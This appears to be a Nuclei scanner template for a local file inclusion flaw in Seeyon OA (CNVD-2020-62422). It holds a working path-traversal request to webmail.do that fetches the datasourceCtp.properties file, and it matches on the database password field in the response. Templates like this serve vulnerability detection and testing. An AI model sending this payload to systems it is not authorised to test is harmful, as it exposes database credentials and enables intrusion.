id: CNVD-2020-62422 info: name: Seeyon - Local File Inclusion author: pikpikcu severity: medium description: Seeyon is vulnerable to local file inclusion. reference: - https://blog.csdn.net/m0_46257936/article/details/113150699 tags: lfi,cnvd,cnvd2020,seeyon metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties" matchers-condition: and matchers: - type: status status: - 200 - type: word part: header words: - "application/x-msdownload" condition: and - type: word part: body words: - "ctpDataSource.password" condition: and